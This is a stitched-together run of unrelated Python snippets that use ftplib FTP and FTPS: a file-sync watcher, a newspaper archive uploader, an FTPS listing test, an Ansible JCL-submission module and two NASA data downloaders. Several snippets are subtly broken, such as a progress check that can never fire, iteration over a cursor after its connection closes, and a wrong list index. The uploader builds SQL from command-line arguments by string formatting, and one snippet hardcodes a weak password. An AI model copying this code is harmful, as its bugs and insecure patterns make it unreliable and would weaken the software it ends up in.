os.makedirs(localdir) for file_ in dirfiles: # `serverpath` is the absolute path of the file on the server, # download it only if it hasn't been already downloaded serverpath = os.path.join(downloading_dir, file_) serverpath = QDir.fromNativeSeparators(serverpath) server_file = File.fromPath(serverpath) self.textStatus.emit('Scanning remote file... ' + serverpath + '...') # How do we know if we should check this server file? # We see if the date last checked is the check start time. if server_file.last_checked_server != check_date: # Do this process only once per file # Added by Simon # Give feedback on scanning of files. fileC += 1 if fileC % 1 == 2: self.textStatus.emit( 'Scanning remote files for changes, ' + str(fileC) + ' files scanned.') # STEP: IS THIS THE FIRST TIME WE SAW THE FILE, OR WAS IT ALREADY IN OUR DB? just_added = not server_file.inserver # STEP: IF ITS A NEW FILE, ENSURE WE DONT WANT TO SKIP IT # Example: If it's a temporary file, or a Unix file with a name we don't support. if just_added: filename = os.path.basename(serverpath) if platform.system() == 'Windows': badName = False for chr in [ '\\', '/', ':', '?', '"', '<', '>', '|' ]: if chr in filename: badName = True break if badName: if filename not in self.warnedNames: self.warnedNames.append(filename) self.badFilenameFound.emit(filename) continue # STEP: ASSUMING THE FILE DID EXIST IN OUR DB, LETS SAVE THE LAST MODIFICATION DATE lastmdate = server_file.servermdate # STEP: SAVE THE MOD DATE TO A VARIABLE # Now we get the last mod time. # We expect this to work fine since this file # was found on the server servermdate = self.lastModified(serverpath) # STEP: SET BOOL SHOWING THAT IT WAS ON THE SERVER, SINCE WE KNOW IT IS. server_file.inserver = True # STEP: SET THE TIME THE FILE WAS LAST CHECKED TO THE SCAN START TIME server_file.last_checked_server = check_date # STEP: SET THE MOD DATE IN THE DATABASE TO THE ONE WE JUST GOT server_file.servermdate = servermdate # STEP: SAVE THIS CHANGE TO THE DATABASE server_file.session.commit() delta = 0 if server_file.inlocal: delta = server_file.timeDiff() # Emit the signals after the attributes has been set and committed if just_added is True: self.fileAdded.emit(ServerWatcher.LOCATION, serverpath) elif server_file.servermdate > lastmdate or delta < -Watcher.TOLERANCE: self.fileChanged.emit(ServerWatcher.LOCATION, serverpath, False) #END FOR self.textStatus.emit('Remote scan- Finding next folder...') dir_ready = True for dir_ in dir_subdirs: # `dirpath` is the absolute path of the subdirectory on the server, dirpath = QDir.fromNativeSeparators( os.path.join(downloading_dir, dir_)) # `downloading_dir` is ready only when all its subdirectory are on the # `checked_dirs` list. if dirpath not in checked_dirs: # Found one subdirectory that is not on `checked_dirs`, # will process it in the next iteration. downloading_dir = dirpath dir_ready = False break if dir_ready is True: # All subdirectories of `downloading_dir` are already in `checked_dirs` if downloading_dir == '/': # All directories ready and at '/', means checkout is complete # So, exit the main While loop!! break else: # Not at '/'. Current directory is ready so is appended to `checked_dirs` # Back one directory to find directories that are not in `checked_dirs` checked_dirs.append(downloading_dir) downloading_dir = os.path.dirname(downloading_dir) self.textStatus.emit('Remote scan- Found Folder...') ##### END OF WHILE ################ ################################################################### # Deleted files are the ones whose `last_checked_server` attribute # didn't get updated in the recursive run. session = Session() deleted = session.query(File).filter( File.last_checked_server < check_date).filter( File.inserver == True) for file_ in deleted: self.fileDeleted.emit(ServerWatcher.LOCATION, file_.path) # Wraps up the checkout process, commits to the database. session.commit() @Slot() def onLogin(self, username, passwd): ok = True msg = '' error_msg = 'Login failed.' try: if not self.ftp: self.ftp = FTP_TLS(self.host) if self.useSSL is True else FTP( self.host) loginResponse = self.ftp.login(username, passwd) except socket.gaierror: self.ftp = None ok = False msg = 'Server address could not be found.' except (error_perm, error_reply): info = traceback.format_exception(*sys.exc_info()) for i in info: sys.stderr.write(i) ok = False msg = error_msg else: if '230' in loginResponse: ok = True else: ok = False msg = error_msg if ok: # Logged in. Now let's do compability tests. if not self.testPermissions(): # User doesn't have write permissions, don't bother doing next test. ok = False msg = 'It seems like you do not have write access to this server.' else: # Permissions test passed, now let's test MFMT for timestamp modification. if not self.testMFMT(): ok = False msg = 'This server does not support timestamp modification\n \ need by this application.' self.loginCompleted.emit(ok, msg) def getFiles(self, path): """ This method simply wraps the `nlst` method with an exception handler, and returns an empty list in case an exception is caught. :param path: Relative or absolute path on the server """ try: nlst = self.ftp.nlst(path) dirs = self.getDirs(path) # Files are items in nlst that are not in dirs files = [ item for item in nlst if os.path.basename(item) not in dirs ] return files except: print 'Exception in ServerWatcher.getDirs' info = traceback.format_exception(*sys.exc_info()) for i in info: sys.stderr.write(i) return [] def getDirs(self, path): """ Retrieves a list of the directories inside `path`, uses `retrlines` and the LIST command to retrieve the items. :param path: Relative or absolute path on the server """ dirs = list() def handleLine(line): """ Recieves a line from the LIST command. This function is meant to be used as callback for the `retrlines` method. :params line: Line from the LIST command """ if line.startswith('d'): # Only lines starting with 'd' are directories # Parse the directory out of the line; lines look like: # 'drwxrwxrwx 1 user group 0 Jun 15 2012 dirname' dirname = line[55:].strip() if dirname != '.' and dirname != '..': # Ignoring '.' and '..' entries dirs.append(dirname) try: self.ftp.retrlines('LIST %s' % path, handleLine) return dirs except: print 'Exception in ServerWatcher.getDirs' info = traceback.format_exception(*sys.exc_info()) for i in info: sys.stderr.write(i) return [] @upload_test def testPermissions(self): # For interface purposes. upload_test takes care of everything. return True @upload_test def testMFMT(self): # Absurd date to test whether the change really happened. time = dt.utcfromtimestamp(100000000) try: self.setLastModified(self.testFile, time) otherTime = self.lastModified(self.testFile) diff = (time - otherTime).total_seconds() if abs(diff) < 2: # Let's give it a 2 seconds tolerance. mdtm = True else: mdtm = False except (ValueError, error_reply, error_perm): info = traceback.format_exception(*sys.exc_info()) for i in info: sys.stderr.write(i) mdtm = False return mdtm @Slot(str) def onDelete(self, filename): self.deleteQueue.append(filename) def deleteNext(self): if len(self.deleteQueue) > 0: next = self.deleteQueue.pop(0) self.deleteFile(next) def deleteAll(self): for filename in self.deleteQueue: self.deleteFile(filename) self.deleteQueue = [] @Slot(str) def deleteFile(self, filename): """ Deletes the file `filename` to the server :param filename: Absolute or relative path to the file """ try: print 'Deleting %s' % filename self.ftp.delete(filename) return True except (error_reply, error_perm): print 'Error deleting %s' % filename return False self.fileEventCompleted.emit() @Slot(str) def onDownload(self, filename): self.downloadQueue.append(filename) def downloadNext(self): if len(self.downloadQueue) > 0: next = self.downloadQueue.pop(0) self.downloadFile(next) def downloadAll(self): for filename in self.downloadQueue: self.downloadFile(filename) self.downloadQueue = [] @Slot(str, str) def downloadFile(self, filename, localpath=None): """ Performs a binary download to the file `filename` located on the server. `filename` parameter can be either absolute or relative, though it can fail for relative paths if the current directory is not appropiate. :param filename: Relative or absolute path to the file :param localpath: Absolute local path where the file will be saved """ def handleChunk(chunk): """ Receives chuncks of data downloaded from the server. This function is meant to be used as callback for the `retrbinary` method. :params chunk: Chunk of downloaded bytes to be written into the file """ # Simply writes the received data into the file `self.downloading` self.downloading.write(chunk) self.download_progress += len(chunk) self.downloadProgress.emit(self.download_size, self.download_progress) if localpath is None: localpath = self.localFromServer(filename) localdir = os.path.dirname(localpath) if not os.path.exists(localdir): # Creates the directory if it doesn't already exists. os.makedirs(localdir) print 'Downloading: %s to %s' % (filename, localpath) try: with open(localpath, 'wb') as f: # Opens the file at `localname` which will hold the downloaded file. # Object attributes regarding download status are updated accordingly. self.fileEvent.emit(filename) self.downloading = f self.download_progress = 0 self.download_size = int( self.ftp.sendcmd('SIZE %s' % filename).split(' ')[-1]) self.ftp.retrbinary('RETR %s' % filename, handleChunk) print 'Download finished' # Let's set the same modified time to that on the server. with File.fromPath(filename) as downloadedfile: mdate = LocalWatcher.lastModified(localpath) downloadedfile.localmdate = mdate downloadedfile.servermdate = mdate self.setLastModified(filename, mdate) downloaded = True except (IOError, OSError): downloaded = False self.ioError.emit(localpath) except (error_reply, error_perm) as ftperr: print 'Error downloading %s, %s' % (filename, ftperr) downloaded = False # TODO: Sometimes the file doesn't complete properly. # in that case we maybe shouldn't call this? self.fileEventCompleted.emit() return downloaded @Slot(str) def onUpload(self, filename): self.uploadQueue.append(filename) def uploadNext(self): if len(self.uploadQueue) > 0: next = self.uploadQueue.pop(0) self.uploadFile(next) def uploadAll(self): for filename in self.uploadQueue: self.uploadFile(filename) self.uploadQueue = [] @Slot(str) def uploadFile(self, filename): """ Uploads the file `filename` to the server, creating the needed directories. :param filename: Absolute or relative path to the file """ def handle(buf): """This function is meant to be used as callback for the `storbinary` method.""" self.upload_progress += 1024 self.uploadProgress.emit(self.upload_size, self.upload_progress) # Creates the directory where the file will be uploaded to self.mkpath(os.path.dirname(filename)) localpath = self.localFromServer(filename) print 'Uploading %s to %s' % (localpath, filename) try: # Uploads file and updates its modified date in the server # to match the date in the local filesystem. self.upload_progress = 0 self.upload_size = os.path.getsize(localpath) self.fileEvent.emit(localpath) self.ftp.storbinary('STOR %s' % filename, open(localpath, 'rb'), 1024, handle) print 'Upload finished' with File.fromPath(filename) as uploaded: modified = uploaded.localmdate uploaded.servermdate = modified self.setLastModified(filename, modified) uploaded = True except (IOError, OSError): uploaded = False self.ioError.emit(localpath) except (error_reply, error_perm, OSError) as err: print 'Error uploading %s, %s' % (filename, err) uploaded = False # TODO: Sometimes the file doesn't complete properly. # in that case we maybe shouldn't call this? self.fileEventCompleted.emit() return uploaded def lastModified(self, filename): """ Uses the MDTM FTP command to find the last modified timestamp of the file `filename`. Returns a `datetime.datetime` object in UTC representing the file's last modified date and time. :param filename: Relative or absolute path to the file """ timestamp = self.ftp.sendcmd('MDTM %s' % filename) if '213 ' not in timestamp: # Second chance was found to be needed in some cases. timestamp = self.ftp.sendcmd('MDTM %s' % filename) timestamp = timestamp.split(' ')[-1] dateformat = '%Y%m%d%H%M%S.%f' if '.' in timestamp else '%Y%m%d%H%M%S' try: mtime = dt.strptime(timestamp, dateformat) except ValueError: mtime = dt.utcnow() return mtime def setLastModified(self, serverpath, newtime): """ Uses the MFMT or MDTM FTP commands to set `newtime` as the modified timestamp of the file `serverpath` on the server. :param serverpath: Relative or absolute path to the file :param newtime: datedatime object holding the required time """ cmds = ['MFMT', 'MDTM'] for cmd in cmds: try: self.ftp.sendcmd( '%s %s %s' % (cmd, newtime.strftime('%Y%m%d%H%M%S'), serverpath)) return except (error_perm, error_reply) as e: if cmd == cmds[len(cmds) - 1]: # If is the last comand, re-raise the exception, else # keep trying. raise e else: continue def mkpath(self, path): """ Creates the path `path` on the server by recursively created folders, if needed. :param path: Absolute path on the server to be created """ try: self.ftp.cwd(path) except error_perm: # `cwd` call failed. Need to create some folders make_dir = '/' steps = path.split('/') for step in steps: if len(step) == 0: continue make_dir += '%s/' % step try: self.ftp.mkd(make_dir) except error_perm: # Probably already exists continue else: # `cwd` call succeed. No need to create # any folders self.ftp.cwd('/') return @Slot(str, str) def added(self, location, serverpath): super(ServerWatcher, self).added(location, serverpath) def actionFromPath(serverpath): f = File() fileExistsOnServer = True try: f.servermdate = self.lastModified(serverpath) except error_perm: fileExistsOnServer = False f.servermdate = 0 f.localmdate = LocalWatcher.lastModified( self.localFromServer(serverpath)) diff = f.timeDiff() action = None if abs(diff) > Watcher.TOLERANCE: if not fileExistsOnServer or diff > 0: action = FileAction(serverpath, FileAction.UPLOAD, ServerWatcher.LOCATION) else: action = FileAction(serverpath, FileAction.DOWNLOAD, LocalWatcher.LOCATION) return action if self.preemptiveCheck: if location == ServerWatcher.LOCATION: localpath = self.localFromServer(serverpath) if not os.path.exists(localpath): action = FileAction(serverpath, FileAction.DOWNLOAD, ServerWatcher.LOCATION) self.preemptiveActions.append(action) else: action = actionFromPath(serverpath) if action is not None: self.preemptiveActions.append(action) elif location == LocalWatcher.LOCATION: try: self.ftp.sendcmd('SIZE %s' % serverpath) except (error_reply, error_perm): exists = False else: exists = True if not exists: action = FileAction(serverpath, FileAction.UPLOAD, LocalWatcher.LOCATION) self.preemptiveActions.append(action) else: action = actionFromPath(serverpath) if action is not None: self.preemptiveActions.append(action) @Slot(str, str) def changed(self, location, serverpath): super(ServerWatcher, self).changed(location, serverpath) @Slot(str, str) def deleted(self, location, serverpath): super(ServerWatcher, self).deleted(location, serverpath) with File.fromPath(serverpath) as deleted: deleted.inserver = False
def ftp_upload(): # Generate a temp folder, make sure the folder not in use while True: temp_folder = "~/temp_" + str(uuid4()) if not os.path.isdir(temp_folder): break subprocess.run(["mkdir", temp_folder]) # Connect to FTP server of the Access Innovations ftps = FTP_TLS() ftps.connect(ftp_address) ftps.sendcmd(f"USER {ftp_username}") ftps.sendcmd(f"PASS {ftp_password}") ftps.cwd(ftp_upload_folder) # Generate language folders for language in language_abbrev_map.values(): try_make_dir(ftps, language) try_make_dir(ftps, f"{language}/combined") try_make_dir(ftps, f"{language}/separate") # Get noids cnx = connect(host=db_address, database=db_database, user=db_username, password=db_password, port=db_port, charset='utf8', use_pure=True) cursor = cnx.cursor() # Count number of newspapers that need to transmit query = (f"SELECT noid, newspaper, year, month, day, language FROM peel_blitz.newspapers WHERE newspaper IN " + f" {tuple(sys.argv[1:] + [''])} AND noid IS NOT NULL AND mounted = 0") cursor.execute(query) temp_sql_result = cursor.fetchall() cnx.close() start_time = datetime.datetime.now() previous_time = start_time fail_count = 0 finish_count = 0 skip_count = 0 total = len(temp_sql_result) # Resolve issues happens in the same day counter_dict = dict() for i, data in enumerate(temp_sql_result): noid, news_abbrev, year, month, day, language = data upload_folder_name = "%s-%d%02d%02d" % (news_abbrev, year, month, day) counter_dict[upload_folder_name] = counter_dict.get(upload_folder_name, 0) + 1 temp_sql_result[i] = data + (counter_dict[upload_folder_name],) del counter_dict for data in cursor: finish_count += 1 noid, news_abbrev, year, month, day, language, counter = data upload_folder_name = "%s-%d%02d%02d%02d" % (news_abbrev, year, month, day, counter) try: # For now, always put into 'separate' folder, but need to put into different language folder ftps.cwd("%s/separate" % language_abbrev_map[language]) print(f"Start processing {upload_folder_name}. NOID: {noid}", color=[42]) # Generate folders on FTP server # Download from OpenStack Swift, upload to FTP server try_make_dir(ftps, upload_folder_name) all_skipped = True for target_folder in transmit_folder_list: try_make_dir(ftps, f"{upload_folder_name}/{target_folder}") # Check if the file is already on FTP server compare_result = compare_size(ftps, noid, upload_folder_name, target_folder) if compare_result[0] and compare_result[1]: print(f"{upload_folder_name}/{target_folder}/1.tar already exist on server. NOID: {noid}", color=[34]) continue # For new / different files, overwrite files on FTP server all_skipped = False print(f"Transmitting {upload_folder_name}/{target_folder}/1.tar") # Try to download from the OpenStack Swift server err = subprocess.run( ["swift", *swift_login, "download", "newspapers", f"{noid}/{target_folder}/1.tar", "-o", f"{temp_folder}/1.tar"], stderr=subprocess.PIPE).stderr.decode() if err: raise error_perm("File does not exist on Swift.") # Overwrite files on FTP server with open(f"{temp_folder}/1.tar", "rb") as transmit_file: ftps.storbinary(f"STOR {upload_folder_name}/{target_folder}/1.tar", transmit_file) # Clean up subprocess.run(["rm", "-f", f"{temp_folder}/1.tar"]) # Get back to the production folder to reselect the language for the next issue ftps.cwd("../..") # Log the success message with open("successlog.log", 'a') as success_log: print(f"Finined {upload_folder_name}. NOID: {noid}", color=[42]) success_log.write(f"{noid}|{upload_folder_name}|Success\n") # For file that already on FTP, skip them if all_skipped: print(f"{upload_folder_name} already exist on server. NOID: {noid} ({finish_count}/{total})", color=[34]) skip_count += 1 continue # Stop current transmission if error occurs except error_perm as e: ftps.cwd("~/uploads/production") fail_count += 1 # Log the reason with open("errorlog.log", 'a') as error_log: print("Error occurs when transmitting %s." % noid, color=[5, 41]) error_log.write(f"Error occurs when transmitting |{noid}|{upload_folder_name}|{e}\n") # Give a detailed program status analysis current_time = datetime.datetime.now() progress = f"{finish_count} out of {total} ({finish_count * 100 / total:.2f}%), {fail_count} failed" max_len = len(progress) + 10 print(f"{'=' * (max_len + 26)}", color=[1, 7, 93]) print(f" Current time is: ", end='', color=[1, 7, 93]) print(f"{current_time}", color=[7, 93], fit_len=max_len) print(f" Current progress: ", end='', color=[1, 7, 93]) print(f"{progress}", color=[7, 93], fit_len=max_len) current_run_time = current_time - start_time current_progress_perc = (finish_count - skip_count) / (total - skip_count) estimate_remain = current_run_time / current_progress_perc - current_run_time print(f" Current total runtime: ", end='', color=[1, 7, 93]) print(f"{current_run_time}", color=[7, 93], fit_len=max_len) print(f" Last update runtime: ", end='', color=[1, 7, 93]) print(f"{current_time - previous_time}", color=[7, 93], fit_len=max_len) print(f" Estimate remaining: ", end='', color=[1, 7, 93]) print(f"{estimate_remain}", color=[7, 93], fit_len=max_len) print(f" Estimate finish time: ", end='', color=[1, 7, 93]) print(f"{current_time + estimate_remain}", color=[7, 93], fit_len=max_len) print(f"{'=' * (max_len + 26)}", color=[1, 7, 93]) previous_time = current_time ftps.close() # Clean up temporary folder subprocess.run(["rm", "-r", temp_folder])
import os #Define credentials user = '******' secret = '123456' host = '192.168.1.113' try: #instantiate FTPS #ftps = FTP_TLS(host,user,secret) ftps = FTP_TLS(host) # TODO check why the next line not work #See http://stackoverflow.com/questions/10207628/python-module-ftplib-ftp-tls-error-530 #Try TLS Lite or M2Crypto both are FTP/TLS client and server. #ftps.login(user,secret) ftps.sendcmd('USER ' + user) ftps.sendcmd('PASS ' + secret) print(ftps.getwelcome()) print('CURRENT WORKING DIRECTORY IS:',ftps.pwd()) #Enable data encryption # TODO solve the encryption problem #ftps.prot_p() #define default DIR d = 'feeds' #Change to default DIR ftps.cwd(d) #Build list of files on servers l = ftps.nlst() l.sort() for i in l: print(i)
def run_module(): module_args = dict(src=dict(type="str", required=True), wait=dict(type="bool", required=False), location=dict( type="str", default="DATA_SET", choices=["DATA_SET", "USS", "LOCAL"], ), volume=dict(type="str", required=False), return_output=dict(type="bool", required=False, default=True), wait_time_s=dict(type="int", default=60), max_rc=dict(type="int", required=False)) module = AnsibleModule(argument_spec=module_args, supports_check_mode=True) result = dict(changed=False, ) location = module.params["location"] volume = module.params["volume"] wait = module.params["wait"] src = module.params["src"] return_output = module.params["return_output"] wait_time_s = module.params["wait_time_s"] max_rc = module.params["max_rc"] if wait_time_s <= 0: module.fail_json( msg= "The option wait_time_s is not valid. It must be greater than 0.", **result) if environ.get('FTP_SOCKS_PORT'): import socks import socket socks.set_default_proxy(socks.SOCKS5, "127.0.0.1", int(environ.get('FTP_SOCKS_PORT'))) socket.socket = socks.socksocket try: if environ.get('FTP_TLS_VERSION'): from ftplib import FTP_TLS import ssl cert_file_path = environ.get('FTP_TLS_CERT_FILE') if cert_file_path: if not path.isfile(cert_file_path): module.fail_json( msg="The TLS cartificate file not found: {0}".format( repr(cert_file_path)), **result) context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT) context.load_verify_locations(cert_file_path) context.check_hostname = False ftp = FTP_TLS(context=context) else: ftp = FTP_TLS() tls_version = environ.get('FTP_TLS_VERSION') if tls_version == '1.2': ftp.ssl_version = ssl.PROTOCOL_TLSv1_2 else: ftp = FTP() ftp.connect(environ.get('FTP_HOST'), int(environ.get('FTP_PORT') or 21)) ftp.login(environ.get('FTP_USERID'), environ.get('FTP_PASSWORD')) ftp.sendcmd("site filetype=jes") ftp.set_pasv(True) if environ.get('FTP_TLS_VERSION'): ftp.prot_p() except Exception as e: module.fail_json( msg="An unexpected error occurred during FTP login: {0}".format( repr(e)), **result) DSN_REGEX = r"^(?:(?:[A-Z$#@]{1}[A-Z0-9$#@-]{0,7})(?:[.]{1})){1,21}[A-Z$#@]{1}[A-Z0-9$#@-]{0,7}(?:\([A-Z$#@]{1}[A-Z0-9$#@]{0,7}\)){0,1}$" try: if location == "DATA_SET": data_set_name_pattern = re.compile(DSN_REGEX, re.IGNORECASE) if PY2: check = data_set_name_pattern.match(src) else: check = data_set_name_pattern.fullmatch(src) if check: if volume is None or volume == "": jobId = submit_pds_jcl(src, ftp, module) else: jobId = submit_jcl_in_volume(src, volume, ftp, module) else: ftp.quit() module.fail_json( msg= "The parameter src for data set is not a valid name pattern. Please check the src input.", **result) else: jobId = submit_ftp_jcl(src, ftp, module) except SubmitJCLError as e: module.fail_json(msg=repr(e), **result) if jobId is None or jobId == "": result["job_id"] = jobId ftp.quit() module.fail_json( msg= "JOB ID Returned is None. Please check whether the JCL is valid.", **result) result["job_id"] = jobId if not wait: wait_time_s = 10 # real time loop - will be used regardless of 'wait' to capture data starttime = timer() loopdone = False foundissue = None while not loopdone: try: job_output_txt = job_output(ftp, wait_time_s, job_id=jobId) except IndexError: pass except Exception as e: result["err_detail"] = "{1} {2}.\n".format( "Error during job submission. The output is:", job_output_txt or " ") module.fail_json(msg=repr(e), **result) if bool(job_output_txt): jot_retcode = job_output_txt[0].get("ret_code") if bool(jot_retcode): job_msg = jot_retcode.get("msg") if re.search( "^(?:{0})".format("|".join(JOB_COMPLETION_MESSAGES)), job_msg): loopdone = True # if the message doesn't have a CC, it is an improper completion (error/abend) if re.search("^(?:CC)", job_msg) is None: foundissue = job_msg if not loopdone: checktime = timer() duration = round(checktime - starttime) if duration >= wait_time_s: loopdone = True result["message"] = { "stdout": "Submit JCL operation succeeded but it is a long running job, exceeding the timeout of " + str(wait_time_s) + " seconds. JobID is " + str(jobId) + "." } else: sleep(1) # End real time loop ^^^ if bool(job_output_txt): result["jobs"] = job_output_txt checktime = timer() duration = round(checktime - starttime) result["duration"] = duration result["changed"] = True if duration >= wait_time_s: result["message"] = { "stdout": "Submit JCL operation succeeded but it is a long running job. Timeout is " + str(wait_time_s) + " seconds. JobID is " + str(jobId) + "." } else: if foundissue is not None: result["changed"] = False result["message"] = { "stderr": "Submit succeeded, but job failed: " + foundissue } result["failed"] = True module.fail_json(msg=result["message"], **result) elif (wait is True and return_output is True and max_rc is not None and max_rc < result.get("jobs")[0].get("ret_code").get("code")): result["message"] = { "stderr": "Submit succeeded, but the return code is more than max_rc: {0}" .format(max_rc) } result["failed"] = True module.fail_json(msg=result["message"], **result) else: result["message"] = { "stdout": "Submit JCL operation succeeded with id of " + str(jobId) + "." } module.exit_json(**result)
def main(master_schedule, db_name): schedule = str(master_schedule) ftps = FTP_TLS(host='gdc.cddis.eosdis.nasa.gov') ftps.login() ftps.prot_p() master_sched_filename = os.path.join(dirname, schedule) mf = open(master_sched_filename, "wb") ftps.sendcmd('TYPE I') ftps.retrbinary('RETR /pub/vlbi/ivscontrol/' + schedule, mf.write) mf.close() valid_experiment = validExpFinder(os.path.join(dirname, schedule)) existing_experiments = checkExistingData(str(db_name)) if existing_experiments == None: experiments_to_download = valid_experiment else: experiments_to_download = [ x for x in valid_experiment if x not in existing_experiments ] year = '20' + schedule[6:8] for exp in experiments_to_download: if os.path.isfile(dirname + '/analysis_reports/' + exp.lower() + '_report.txt'): print("Analysis report already exists for " + exp.lower() + ", skipping file downloads.") continue else: #ftp = FTP('cddis.gsfc.nasa.gov') exp = exp.lower() print('Beginning file downloads for experiment ' + exp + ".") ftps = FTP_TLS(host='gdc.cddis.eosdis.nasa.gov') ftps.login() ftps.prot_p() # Download SKED file try: filename_skd = [] ftps.retrlines( 'LIST /pub/vlbi/ivsdata/aux/' + str(year) + '/' + exp + '/' + exp + '.skd', filename_skd.append) if len(filename_skd) > 0: local_filename_skd = os.path.join( dirname, 'skd_files/' + exp + '.skd') ftps.sendcmd('TYPE I') lf3 = open(local_filename_skd, "wb") ftps.retrbinary( 'RETR /pub/vlbi/ivsdata/aux/' + str(year) + '/' + exp + '/' + exp + ".skd", lf3.write) lf3.close() except Exception: print('No SKED file found for ' + exp) # Spelling options need to be here because analysis report names are unfortunately not standardised - sometimes they are even different within the same experiment (e.g. 'ivs' and 'IVS') # Now time to download analysis report options = ['ivs', 'IVS', 'usno', 'USNO', 'NASA'] for spelling in options: filename_report = [] try: ftps.retrlines( 'LIST /pub/vlbi/ivsdata/aux/' + str(year) + '/' + exp + '/' + exp + '-' + spelling + '-analysis-report*', filename_report.append) if len(filename_report) > 0: local_filename_report = os.path.join( dirname, 'analysis_reports/' + exp + '_report.txt') ftps.sendcmd('TYPE I') lf1 = open(local_filename_report, "wb") ftps.retrbinary( 'RETR /pub/vlbi/ivsdata/aux/' + str(year) + '/' + exp + '/' + filename_report[len(filename_report) - 1].split()[8], lf1.write) lf1.close() print('Analysis report downloaded for experiment ' + exp + ".") break except Exception: pass # Download spool file for spelling in options: filename_spool = [] try: ftps.retrlines( 'LIST /pub/vlbi/ivsdata/aux/' + str(year) + '/' + exp + '/' + exp + '-' + spelling + '-analysis-spoolfile*', filename_spool.append) if len(filename_spool) > 0: local_filename_spool = os.path.join( dirname, 'analysis_reports/' + exp + '_spoolfile.txt') ftps.sendcmd('TYPE I') lf2 = open(local_filename_spool, "wb") ftps.retrbinary( 'RETR /pub/vlbi/ivsdata/aux/' + str(year) + '/' + exp + '/' + filename_spool[len(filename_report) - 1].split()[8], lf2.write) lf2.close() print('Spoolfile downloaded for experiment ' + exp + ".") break except Exception: pass # Download old style analysis report if it exists. try: filename_report_old = [] ftps.retrlines( 'LIST /pub/vlbi/ivsdata/aux/' + str(year) + '/' + exp + '/' + exp + '-analyst.txt', filename_report_old.append) if len(filename_report_old) > 0: local_filename_report = os.path.join( dirname, 'analysis_reports/' + exp + '_report.txt') ftps.sendcmd('TYPE I') lf1 = open(local_filename_report, "wb") ftps.retrbinary( 'RETR /pub/vlbi/ivsdata/aux/' + str(year) + '/' + exp + '/' + exp + "-analyst.txt", lf1.write) lf1.close() except Exception: pass
def getPpsFiles(): global ftpConnection,forceHttps print ('Connecting to PPS') if forceHttps==False: try: ftpConnection = FTP_TLS('arthurhouftps.pps.eosdis.nasa.gov') print (ftpConnection.getwelcome()) ftpConnection.login(userid,userid) ftpConnection.sendcmd('TYPE i') print ('Connected. Getting files...') except Exception as e: print ('Failed to connect to the PPS ftps server due to ' + str(e)) print ('Trying https') ftpConnection=None if (ftpConnection==None): password_mgr = urllib.request.HTTPPasswordMgrWithDefaultRealm() password_mgr.add_password(None,'https://arthurhouhttps.pps.eosdis.nasa.gov',userid,userid) handler = urllib.request.HTTPBasicAuthHandler(password_mgr) opener = urllib.request.build_opener(handler) urllib.request.install_opener(opener) # The following is the list of PPS files to transfer: get('/gpmallversions/V06/2015/08/26/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150826-S000000-E002959.0000.V06B.zip','ce82a32890c2b891eafdfaebaa2d107c538bd9b6') get('/gpmallversions/V06/2015/08/26/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150826-S003000-E005959.0030.V06B.zip','33da0df515f21fae42329ed83f04f6b1a857175e') get('/gpmallversions/V06/2015/08/26/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150826-S010000-E012959.0060.V06B.zip','99e7154baf640900083b55172825230c2200599d') get('/gpmallversions/V06/2015/08/26/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150826-S013000-E015959.0090.V06B.zip','6fc80450b77a8d8e4257eec9cc8ad070a58627fc') get('/gpmallversions/V06/2015/08/26/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150826-S020000-E022959.0120.V06B.zip','f74f4ee73333dda7c426fb2b56092de77ff8a727') get('/gpmallversions/V06/2015/08/26/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150826-S023000-E025959.0150.V06B.zip','8fb23ea8b38abe91abf16c86de82a2e571d42bff') get('/gpmallversions/V06/2015/08/26/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150826-S030000-E032959.0180.V06B.zip','53959d210c4401140691c9d28723a3f56dc5a60b') get('/gpmallversions/V06/2015/08/26/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150826-S033000-E035959.0210.V06B.zip','1b773294f449e5b379777d3a02141207521a0c31') get('/gpmallversions/V06/2015/08/26/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150826-S040000-E042959.0240.V06B.zip','094e6b2550368219144bfaa82f777e0207a3a8ea') get('/gpmallversions/V06/2015/08/26/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150826-S043000-E045959.0270.V06B.zip','f4632100f6826cfbedf9fbef34f2e79584ad3ca5') get('/gpmallversions/V06/2015/08/26/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150826-S050000-E052959.0300.V06B.zip','fadfce2182686cd6e7e52e02820e327cf30ce48c') get('/gpmallversions/V06/2015/08/26/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150826-S053000-E055959.0330.V06B.zip','f628751c2ef625bd6a603e92cecac69fcc8a0bb1') get('/gpmallversions/V06/2015/08/26/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150826-S060000-E062959.0360.V06B.zip','e6082a960b38eb7863aa456a67738ffba1c21bee') get('/gpmallversions/V06/2015/08/26/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150826-S063000-E065959.0390.V06B.zip','9ccca67db72a4aa98aaa1a621cc45f7d10a72799') get('/gpmallversions/V06/2015/08/26/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150826-S070000-E072959.0420.V06B.zip','78fbea6837987ec7ad9eef48cace9ae398e22b2f') get('/gpmallversions/V06/2015/08/26/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150826-S073000-E075959.0450.V06B.zip','d2d3f6f972e5a4fd5fe19002b6b0bf88a6ed867b') get('/gpmallversions/V06/2015/08/26/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150826-S080000-E082959.0480.V06B.zip','ad55f523e2cec0e4b6cb9148175819b1acfd9ba8') get('/gpmallversions/V06/2015/08/26/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150826-S083000-E085959.0510.V06B.zip','ddb641fadf9df87ac5f2733bcb9784bbe505e31d') get('/gpmallversions/V06/2015/08/26/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150826-S090000-E092959.0540.V06B.zip','4bb606027c6359d3b59bca6420c1b1c0d6d5f44a') get('/gpmallversions/V06/2015/08/26/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150826-S093000-E095959.0570.V06B.zip','2c2ad36c23645286b54c476e7d56648e2dfe4426') 